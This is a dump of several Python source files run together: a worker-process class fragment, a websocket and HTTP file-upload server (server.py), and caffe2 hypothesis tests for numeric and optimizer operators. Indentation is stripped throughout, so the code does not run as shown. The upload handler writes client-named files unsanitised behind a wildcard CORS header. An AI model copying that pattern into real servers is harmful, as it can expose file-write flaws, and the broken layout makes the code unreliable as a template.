@property
def workers_alive(self) -> bool:
"""Returns actor worker processes are alive or not."""
return self.n_processes == 0 or all([p.is_alive() for p in self.ps])
def start(self) -> None:
"""Run child process tasks."""
if self.n_processes > 0:
[q.put(True) for q in self.start_queue]
def finalize(self) -> None:
"""Finalize processes."""
[p.terminate() for p in self.ps]
[p.join() for p in self.ps]
|
server.py
|
import websockets
import asyncio
import traceback
import jsonpickle
import json
import inspect
from . import utils
from http.server import HTTPServer, SimpleHTTPRequestHandler
import threading
import os
import io
import cgi
from .manager import *
class ReqHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
return
def translate_path(self, path):
return utils.translate_path(path)
def end_headers (self):
self.send_header('Access-Control-Allow-Origin', '*')
SimpleHTTPRequestHandler.end_headers(self)
def do_POST(self):
r, info = self.deal_post_data()
print(r, info, "by: ", self.client_address)
f = io.BytesIO()
if r:
f.write(b"Success\n")
else:
f.write(b"Failed\n")
length = f.tell()
f.seek(0)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-Length", str(length))
self.end_headers()
if f:
self.copyfile(f, self.wfile)
f.close()
def deal_post_data(self):
ctype, _ = cgi.parse_header(self.headers['Content-Type'])
if ctype == 'multipart/form-data':
form = cgi.FieldStorage( fp=self.rfile, headers=self.headers, environ =
{'REQUEST_METHOD':'POST', 'CONTENT_TYPE':self.headers['Content-Type'],})
try:
fs = form.list[0]
fn = upload_path(fs.filename)
open(fn, "wb").write(fs.file.read())
except IOError:
return (False, "Can't create file to write, do you have permission to write?")
return (True, "Files uploaded")
return (False,'Invalide header type!')
def start_server(path, port=8000):
'''Start a resource webserver serving path on port'''
httpd = HTTPServer(('', port), ReqHandler)
httpd.serve_forever()
def start(appname, port = 8000, user_type = User, user_dir = '',pretty_print = False,
socket_port = 1234, upload_dir = 'upload', translate_path = None):
set_utils(appname,user_dir,port,upload_dir, translate_path)
pretty_print = pretty_print
daemon = threading.Thread(name='daemon_server', target=start_server, args=('.', port))
daemon.setDaemon(True)
daemon.start()
indent = 4 if pretty_print else None
def jsonString(obj):
return json.dumps(json.loads(jsonpickle.encode(obj,unpicklable=False)),
indent = indent, sort_keys = pretty_print)
async def session(websocket, path):
address = websocket.remote_address
try:
if address in users:
user = users[address]
else:
user = user_type()
user.load()
users[address] = user
await websocket.send(jsonString([user.menu,user.screen]))
async for message in websocket:
if address in users:
user = users[address]
else:
print('Unknown user search error!')
return
data = json.loads(message)
result = user.result4message(data)
if result:
await websocket.send(jsonString(user.prepare_result(result)))
except Exception as e:
if getattr(e,'code',0) != 1006: #client interruption
print(e,traceback.format_exc())
finally:
if address in users:
del users[address]
print(f'Start {appname} server on {port} port..')
asyncio.get_event_loop().run_until_complete(
websockets.serve(session, '0.0.0.0', socket_port))
asyncio.get_event_loop().run_forever()
|
hypothesis_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import copy
import time
from functools import partial, reduce
from future.utils import viewitems, viewkeys
from hypothesis import assume, given, settings
import hypothesis.strategies as st
import unittest
from caffe2.python import core, workspace, tt_core, dyndep
import caffe2.python.hypothesis_test_util as hu
from caffe2.proto.caffe2_pb2 import TensorProto
dyndep.InitOpsLibrary('@/caffe2/caffe2/fb/optimizers:sgd_simd_ops')
def sigmoid(x):
return 1.0 / (1.0 + np.exp(-x))
@st.composite
def _tensor_and_prefix(draw, dtype, elements, min_dim=1, max_dim=4, **kwargs):
dims_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
extra_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
assume(len(dims_) + len(extra_) < max_dim)
return (draw(hu.arrays(dims_ + extra_, dtype, elements)),
draw(hu.arrays(extra_, dtype, elements)))
def _tensor_and_indices(min_dim=1, max_dim=4, dtype=np.float32,
elements=None, **kwargs):
""" generates a tensor and a list of indices of larger tensor of same dim"""
data_dims_ = st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim)
original_dim = st.integers(min_value=2, max_value=10)
return st.tuples(data_dims_, original_dim).flatmap(lambda pair: st.tuples(
st.just(pair[1]), # original dimension
hu.arrays(pair[0], dtype, elements), # data tensor
hu.arrays(pair[0][0], dtype=np.int64, elements=st.integers(
min_value=0, max_value=pair[1] - 1)),
))
_NUMPY_TYPE_TO_ENUM = {
np.float32: core.DataType.FLOAT,
np.int32: core.DataType.INT32,
np.bool: core.DataType.BOOL,
np.uint8: core.DataType.UINT8,
np.int8: core.DataType.INT8,
np.uint16: core.DataType.UINT16,
np.int16: core.DataType.INT16,
np.int64: core.DataType.INT64,
np.float64: core.DataType.DOUBLE,
}
def _dtypes(dtypes=None):
dtypes = dtypes if dtypes else [np.int32, np.int64, np.float32]
return st.sampled_from(dtypes)
def _test_binary(name, ref, filter_=None, gcs=hu.gcs,
test_gradient=False, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(
lambda dtype: hu.tensors(
n=2, dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
out=st.sampled_from(('Y', 'X1', 'X2') if allow_inplace else ('Y',)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary(self, inputs, out, gc, dc):
op = core.CreateOperator(name, ["X1", "X2"], [out])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
# We only do gradient check with float32 types.
if test_gradient and X1.dtype == np.float32:
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
return test_binary
def _test_binary_broadcast(name, ref, filter_=None,
gcs=hu.gcs, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(lambda dtype: _tensor_and_prefix(
dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
in_place=(st.booleans() if allow_inplace else st.just(False)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary_broadcast(self, inputs, in_place, gc, dc):
op = core.CreateOperator(
name, ["X1", "X2"], ["X1" if in_place else "Y"], broadcast=1)
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
def cast_ref(x, y):
return (np.array(ref(x, y)[0], dtype=x.dtype), )
# gradient not implemented yet
# self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], cast_ref)
return test_binary_broadcast
class TestOperators(hu.HypothesisTestCase):
def test_comparison_ops(self):
ops = {"LT": lambda x1, x2: [x1 < x2],
"LE": lambda x1, x2: [x1 <= x2],
"GT": lambda x1, x2: [x1 > x2],
"GE": lambda x1, x2: [x1 >= x2]}
for name, ref in viewitems(ops):
_test_binary(name, ref, gcs=hu.gcs_cpu_only)(self)
_test_binary_broadcast(name, ref, gcs=hu.gcs_cpu_only)(self)
@given(inputs=hu.tensors(n=2), in_place=st.booleans(), **hu.gcs)
def test_sum(self, inputs, in_place, gc, dc):
op = core.CreateOperator("Sum", ["X1", "X2"],
["Y" if not in_place else "X1"])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_row_mul(self, inputs, gc, dc):
op = core.CreateOperator("RowMul", ["X1", "X2"], ["Y"])
X1, Xtmp = inputs
X2 = Xtmp[:, 0]
def ref(x, y):
ret = np.zeros(shape=x.shape, dtype=x.dtype)
for i in range(y.size):
ret[i, ] = x[i, ] * y[i]
return [ret]
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
@given(inputs=hu.tensors(n=2), **hu.gcs_cpu_only)
def test_max(self, inputs, gc, dc):
op = core.CreateOperator("Max", ["X1", "X2"], ["Y"])
X1, X2 = inputs
# Make X1 and X2 far from each other, since X1=X2 is not differentiable
# and the step size of gradient checker is 0.05
X1[np.logical_and(X1 >= X2 - 0.05, X1 <= X2)] -= 0.05
X1[np.logical_and(X1 <= X2 + 0.05, X1 >= X2)] += 0.05
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
def elementwise_max(X, Y):
return [np.maximum(X, Y)]
self.assertReferenceChecks(gc, op, [X1, X2], elementwise_max)
def test_add(self):
def ref(x, y):
return (x + y, )
_test_binary("Add", ref, test_gradient=True)(self)
_test_binary_broadcast("Add", ref)(self)
def test_sub(self):
def ref(x, y):
return (x - y, )
# TODO(jiayq): enable gradient test when implemented.
_test_binary("Sub", ref, test_gradient=True)(self)
_test_binary_broadcast("Sub", ref)(self)
def test_mul(self):
def ref(x, y):
return (x * y, )
_test_binary("Mul", ref, test_gradient=True)(self)
_test_binary_broadcast("Mul", ref)(self)
def test_div(self):
def ref(x, y):
return (x / y, )
def non_zero(x):
return abs(x) > 10e-5
def div_dtypes():
return st.sampled_from([np.float32, np.float64])
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=True,
dtypes=div_dtypes, gcs=hu.gcs_cpu_only
)(self)
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=False,
dtypes=div_dtypes
)(self)
_test_binary_broadcast(
"Div", ref, filter_=non_zero, dtypes=div_dtypes)(self)
@given(X=hu.tensor(), in_place=st.booleans(), **hu.gcs)
def test_negative(self, X, in_place, gc, dc):
op = core.CreateOperator("Negative", ["X"],
["Y" if not in_place else "X"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_tanh(self, X, gc, dc):
op = core.CreateOperator("Tanh", "X", "Y")
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_averaged_loss(self, X, gc, dc):
op = core.CreateOperator("AveragedLoss", ["X"], ["loss"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), inplace=st.booleans(), **hu.gcs)
def test_softsign(self, X, inplace, gc, dc):
op = core.CreateOperator("Softsign", ["X"], ["X" if inplace else "Y"])
def softsign(X):
return (X / (1 + np.abs(X)),)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertReferenceChecks(gc, op, [X], softsign)
if inplace:
with self.assertRaises(Exception):
self.assertGradientChecks(gc, op, [X], 0, [0])
else:
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(
device_options=st.lists(
min_size=2,
max_size=4,
elements=st.sampled_from(hu.expanded_device_options)),
set_seed=st.booleans())
def test_random_seed_behaviour(self, device_options, set_seed):
# Assume we are always operating on CUDA or CPU, since RNG is
# inconsistent between CPU and GPU.
device_options = copy.deepcopy(device_options)
assume(len({do.device_type for do in device_options}) == 1)
if set_seed:
for do in device_options:
do.random_seed = 1000
def run(do):
# Reset each time because 'Y' may already exist in the workspace
# on a different device
workspace.ResetWorkspace()
ws = workspace.C.Workspace()
op = core.CreateOperator(
"XavierFill", [], ["Y"],
device_option=do,
shape=[2])
ws.run(op)
return ws.blobs["Y"].fetch()
ys = [run(do) for do in device_options]
for y in ys[1:]:
if set_seed:
np.testing.assert_array_equal(ys[0], y)
else:
with self.assertRaises(AssertionError):
np.testing.assert_array_equal(ys[0], y)
@given(axis=st.integers(min_value=1, max_value=4),
num_output=st.integers(min_value=4, max_value=8),
engine=st.sampled_from(["", "PACKED"]),
**hu.gcs)
def test_fully_connected_axis(self, axis, num_output, engine, gc, dc):
np.random.seed(1)
X = np.random.randn(1, 2, 3, 2, 1).astype(np.float32)
def prod(xs):
p = 1
for x in xs:
p *= x
return p
K = prod(list(X.shape)[axis:])
N = num_output
W = np.random.randn(N, K).astype(np.float32)
b = np.random.randn(N).astype(np.float32)
op = core.CreateOperator(
"FC",
["X", "W", "b"],
["Y"],
engine=engine,
axis=axis)
for name, param in [("X", X), ("W", W), ("b", b)]:
self.ws.create_blob(name).feed(param)
self.ws.run(op)
Y = self.ws.blobs["Y"].fetch()
self.assertEqual(list(Y.shape), list(X.shape)[:axis] + [N])
inputs = [X, W, b]
self.assertDeviceChecks(dc, op, inputs, [0])
for param, _ in enumerate(inputs):
self.assertGradientChecks(gc, op, inputs, param, [0])
@unittest.skipIf(not workspace.has_gpu_support,
"Skipping test due to no gpu present.")
@given(hidden_size=st.integers(min_value=1, max_value=3),
num_layers=st.integers(min_value=1, max_value=3),
bidirectional=st.just(False), # TODO
rnn_mode=st.sampled_from(["lstm"]), # TODO: "gru"
input_mode=st.sampled_from(["linear"]),
dropout=st.floats(min_value=1.0, max_value=1.0),
T=st.integers(min_value=2, max_value=6),
N=st.integers(min_value=1, max_value=4),
D=st.integers(min_value=1, max_value=4))
def test_recurrent(self, hidden_size, num_layers, bidirectional, rnn_mode,
input_mode, dropout, T, N, D):
# Random seed, this one happens to pass
seed = 1234
np.random.seed(seed)
input_weight_size = hidden_size * D
upper_layer_input_weight_size = hidden_size * hidden_size
recurrent_weight_size = hidden_size * hidden_size
input_bias_size = hidden_size
recurrent_bias_size = hidden_size
num_directions = 2 if bidirectional else 1
first_layer_sz = input_weight_size + recurrent_weight_size + \
input_bias_size + recurrent_bias_size
upper_layer_sz = upper_layer_input_weight_size + \
recurrent_weight_size + input_bias_size + \
recurrent_bias_size
total_sz = 4 * (first_layer_sz + (num_layers - 1) * upper_layer_sz)
total_sz *= num_directions
W = np.random.rand(total_sz).astype(np.float32)
self.ws.create_blob("WEIGHT").feed(W, device_option=hu.gpu_do)
op = core.CreateOperator(
"Recurrent",
["INPUT", "HIDDEN_INPUT", "CELL_INPUT", "WEIGHT"],
["OUTPUT", "HIDDEN_OUTPUT", "CELL_OUTPUT",
"RNN_SCRATCH", "DROPOUT_STATES"],
hidden_size=hidden_size,
bidirectional=bidirectional,
rnn_mode=rnn_mode,
dropout=dropout,
input_mode=input_mode,
num_layers=num_layers,
seed=seed,
engine="CUDNN")
X = np.random.randn(T, N, D).astype(np.float32)
self.ws.create_blob("INPUT").feed(X, device_option=hu.gpu_do)
W = self.ws.blobs["WEIGHT"].fetch()
H = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32)
C = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32) if rnn_mode == "lstm" else \
np.empty((1,)).astype(np.float32) # unused in GRU
inputs = [X, H, C, W]
input_idxs = [i for (i, _) in enumerate(inputs)] \
if rnn_mode == "lstm" else [0, 1, 3] # ignore C
for input_idx in input_idxs:
self.assertGradientChecks(
hu.gpu_do, op, inputs, input_idx, [0],
stepsize=0.01, threshold=0.01)
@given(ndim=st.integers(1, 4),
axis=st.integers(0, 3),
add_axis=st.integers(0, 1),
num_inputs=st.integers(2, 4), **hu.gcs)
def test_depth_concat(self, ndim, axis, add_axis, num_inputs, gc, dc):
assume(axis < ndim)
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7][:ndim]
individual_dims = [1, 2, 3, 4, 5][:num_inputs]
inputs = []
for i in range(num_inputs):
if add_axis == 0:
# Sets a unique dim and create the input.
shape[axis] = individual_dims[i]
inputs.append(np.random.randn(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
axis=axis, add_axis=add_axis)
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat(*inputs):
inputs = list(inputs)
if add_axis:
for i in range(len(inputs)):
inputs[i] = np.expand_dims(inputs[i], axis)
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat)
@given(num_inputs=st.integers(2, 4),
order=st.sampled_from([("NCHW", 1), ("NHWC", 3)]),
**hu.gcs)
def test_depth_concat_with_order(self, num_inputs, order, gc, dc):
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7]
individual_dims = [1, 2, 3, 4][:num_inputs]
inputs = []
for i in range(num_inputs):
# Sets a unique dim and create the input.
shape[order[1]] = individual_dims[i]
inputs.append(np.random.rand(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
order=order[0])
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat_with_order(*inputs):
inputs = list(inputs)
axis = order[1]
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat_with_order)
@given(X=hu.arrays(dims=[5, 2],
elements=st.floats(min_value=0.0, max_value=10.0)),
**hu.gcs_cpu_only)
def test_last_n_windows(self, X, gc, dc):
workspace.FeedBlob('input', X)
workspace.FeedBlob('next', np.array(0, dtype=np.int32))
workspace.CreateBlob('output')
collect_net = core.Net('collect_net')
collect_net.LastNWindowCollector(
['output', 'next', 'input'],
['output', 'next'],
num_to_collect=7,
)
plan = core.Plan('collect_data')
plan.AddStep(core.execution_step('collect_data',
[collect_net], num_iter=2))
workspace.RunPlan(plan)
output = workspace.FetchBlob('output')
inputs = workspace.FetchBlob('input')
new_output = np.zeros([7, inputs.shape[1]])
for i in range(inputs.shape[0] * 2):
new_output[i % 7] = inputs[i % inputs.shape[0]]
import numpy.testing as npt
npt.assert_almost_equal(output, new_output, decimal=5)
@given(batch_size=st.integers(1, 3),
stride=st.integers(1, 3),
pad=st.integers(0, 3),
kernel=st.integers(1, 5),
dilation=st.integers(1, 3),
size=st.integers(7, 10),
channels=st.integers(1, 8),
**hu.gcs)
def test_im2col_layout(self, batch_size, stride, pad, kernel, dilation,
size, channels, gc, dc):
dkernel = (dilation * (kernel - 1) + 1)
assume(size >= dkernel)
NCHW_TO_NHWC = (0, 2, 3, 1)
NHWC_TO_NCHW = (0, 3, 1, 2)
COL_NHWC_TO_NCHW = (4, 2, 3, 0, 1)
N = batch_size
C = channels
H = size
W = size
out_h = int((H + (2 * pad) - dkernel) / stride + 1)
out_w = int((W + (2 * pad) - dkernel) / stride + 1)
im_nchw = np.random.rand(N, C, H, W).astype(np.float32) - 0.5
im_nhwc = im_nchw.transpose(NCHW_TO_NHWC)
op_im2col_nchw = core.CreateOperator(
"Im2Col",
["im_nchw"], ["col_nchw"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order="NCHW",
device_option=gc)
op_im2col_nhwc = core.CreateOperator(
"Im2Col",
["im_nhwc"], ["col_nhwc"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order="NHWC",
device_option=gc)
self.ws.create_blob("im_nchw").feed(im_nchw, device_option=gc)
self.ws.create_blob("im_nhwc").feed(im_nhwc, device_option=gc)
self.ws.run(op_im2col_nchw)
self.ws.run(op_im2col_nhwc)
# there is probably a clever way to spell this in np
col_nchw = self.ws.blobs["col_nchw"].fetch()
col_nhwc = self.ws.blobs["col_nhwc"].fetch()
col_nchw_ = col_nchw.reshape(N, C, kernel, kernel, out_h, out_w)
col_nhwc_ = col_nhwc.reshape(N, out_h, out_w, kernel, kernel, C)
for i in range(0, N):
np.testing.assert_allclose(
col_nchw_[i],
col_nhwc_[i].transpose(COL_NHWC_TO_NCHW),
atol=1e-4,
rtol=1e-4)
op_col2im_nchw = core.CreateOperator(
"Col2Im",
["col_nchw", "im_nchw"],
["out_nchw"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order="NCHW",
device_option=gc)
op_col2im_nhwc = core.CreateOperator(
"Col2Im",
["col_nhwc", "im_nhwc"],
["out_nhwc"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order="NHWC",
device_option=gc)
self.ws.run(op_col2im_nchw)
self.ws.run(op_col2im_nhwc)
out_nchw = self.ws.blobs["out_nchw"].fetch()
out_nhwc = self.ws.blobs["out_nhwc"].fetch()
np.testing.assert_allclose(
out_nchw,
out_nhwc.transpose(NHWC_TO_NCHW),
atol=1e-4,
rtol=1e-4)
@given(dtype=st.sampled_from([np.float32, np.float64, np.int32, np.bool]))
def test_print(self, dtype):
data = np.random.permutation(6).astype(dtype)
self.ws.create_blob("data").feed(data)
op = core.CreateOperator("Print", "data", [])
self.ws.run(op)
@given(inputs=hu.tensors(n=2),
in_place=st.booleans(),
momentum=st.floats(min_value=0.1, max_value=0.9),
nesterov=st.booleans(),
lr=st.floats(min_value=0.1, max_value=0.9),
**hu.gcs)
def test_momentum_sgd(
self, inputs, in_place, momentum, nesterov, lr, gc, dc):
grad, m = inputs
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"MomentumSGD",
["grad", "m", "lr"],
["grad" if in_place else "grad_o",
"m" if in_place else "m_o"],
momentum=momentum,
nesterov=int(nesterov),
device_option=gc)
self.assertDeviceChecks(
dc, op, [grad, m, lr], [0])
# Reference
def momentum_sgd(grad, m, lr):
lr = lr[0]
if not nesterov:
adjusted_gradient = lr * grad + momentum * m
return (adjusted_gradient, adjusted_gradient)
else:
m_new = momentum * m + lr * grad
return ((1 + momentum) * m_new - momentum * m, m_new)
self.assertReferenceChecks(gc, op, [grad, m, lr], momentum_sgd)
@given(inputs=hu.tensors(n=3),
in_place=st.booleans(),
decay=st.floats(min_value=0.1, max_value=0.9),
momentum=st.floats(min_value=0.1, max_value=0.9),
lr=st.floats(min_value=0.1, max_value=0.9),
epsilon=st.floats(min_value=1e-5, max_value=1e-2),
**hu.gcs)
def test_rmsprop_sgd(self, inputs, in_place, decay, momentum, lr, epsilon,
gc, dc):
grad, ms, mom = inputs
ms = np.abs(ms) + 0.01
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"RmsProp",
["grad", "ms", "mom", "lr"],
["grad" if in_place else "grad_o",
"ms" if in_place else "ms_o",
"mom" if in_place else "mom_o"],
momentum=momentum, decay=decay, epsilon=epsilon, device_option=gc)
self.assertDeviceChecks(dc, op, [grad, ms, mom, lr], [0])
def rmsprop(grad, ms, mom, lr):
lr = lr[0]
ms_o = ms + (1. - decay) * (np.square(grad) - ms)
mom_o = momentum * mom + lr * grad / np.sqrt(epsilon + ms_o)
grad_o = mom_o
return (grad_o, ms_o, mom_o)
self.assertReferenceChecks(gc, op, [grad, ms, mom, lr], rmsprop)
# Reference
@staticmethod
def _dense_ftrl(alpha, beta, lambda1, lambda2, w, nz, g):
if isinstance(alpha, np.ndarray):
alpha = np.asscalar(alpha)
n = np.take(nz, 0, axis=-1)
z = np.take(nz, 1, axis=-1)
# python port of Sigrid's implementation
g2 = g * g
sigma = (np.sqrt(n + g2) - np.sqrt(n)) / alpha
z += g - sigma * w
n += g2
w = (np.sign(z) * lambda1 - z) / (
(beta + np.sqrt(n)) / alpha + lambda2)
w[np.abs(z) <= lambda1] = 0
return (w, np.stack([n, z], axis=-1))
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd(self, inputs, in_place, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad],
partial(self._dense_ftrl, alpha, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd(self, inputs, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad"],
["var", "nz"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad], [0])
# Reference
def ftrl(w, nz, i, g):
sw, snz = self._dense_ftrl(alpha, beta, lambda1, lambda2,
w[i], nz[i], g)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad], ftrl)
# Reference
@staticmethod
def _dense_ftrl_send_alpha_by_input(beta, lambda1, lambda2, w, nz, g, alpha):
return TestOperators._dense_ftrl(alpha, beta, lambda1, lambda2, w, nz,
g)
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd_send_alpha_by_input(self, inputs, in_place, alpha, beta,
lambda1, lambda2, engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad", "alpha"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad, alpha], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad, alpha],
partial(self._dense_ftrl_send_alpha_by_input, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd_send_alpha_by_input(self, inputs, alpha, beta,
lambda1, lambda2, engine, gc,
dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad", "alpha"],
["var", "nz"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad, alpha], [0])
# Reference
def ftrl(w, nz, i, g, alpha):
sw, snz = self._dense_ftrl_send_alpha_by_input(beta, lambda1,
lambda2, w[i], nz[i],
g, alpha)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad, alpha],
ftrl)
@given(input=hu.tensor(max_value=20,
max_dim=1,
dtype=np.int32,
elements=st.integers(min_value=0, max_value=10)),
with_remapping=st.booleans(),
**hu.gcs)
def test_unique(self, input, with_remapping, gc, dc):
op = core.CreateOperator(
"Unique",
["input"],
["unique"] + (["remapping"] if with_remapping else []),
device_option=gc)
self.assertDeviceChecks(dc, op, [input], [0])
# Validator
def unique_valid(input, unique, remapping=None):
self.assertEqual(unique.size, len(set(input)))
self.assertEqual(sorted(unique), sorted(set(input)))
if with_remapping:
self.assertEqual(remapping.shape, input.shape)
remapped = [unique[remapping[i]] for i in range(len(input))]
np.testing.assert_array_equal(remapped, input)
self.assertValidationChecks(gc, op, [input], unique_valid)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
top_k=st.integers(min_value=1, max_value=3),
**hu.gcs)
def test_accuracy(self, prediction, labels, top_k, gc, dc):
if(top_k > 1):
gc = hu.cpu_do
op = core.CreateOperator(
"Accuracy",
["prediction", "labels"],
["accuracy"],
top_k=top_k,
device_option=gc
)
def op_ref(prediction, labels, top_k):
N = prediction.shape[0]
correct = 0
for i in range(0, len(prediction)):
pred_sorted = sorted(
([item, j] for j, item in enumerate(prediction[i])),
key=lambda x: x[0],
reverse=True
)
max_ids = [x[1] for x in pred_sorted[0:top_k]]
for m in max_ids:
if m == labels[i]:
correct += 1
accuracy = correct / N
return (accuracy,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels, top_k],
reference=op_ref)
@given(target_probabilities=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0.01,
max_value=1)),
**hu.gcs)
def test_perplexity(self, target_probabilities, gc, dc):
op = core.CreateOperator(
"Perplexity",
["target_probabilities"],
["perplexity"]
)
def op_ref(target_probabilities):
N = target_probabilities.shape[0]
perplexities = np.power(target_probabilities, -1.0 / N)
perplexity = reduce(lambda x, y: x * y, perplexities)
return (perplexity,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[target_probabilities],
reference=op_ref)
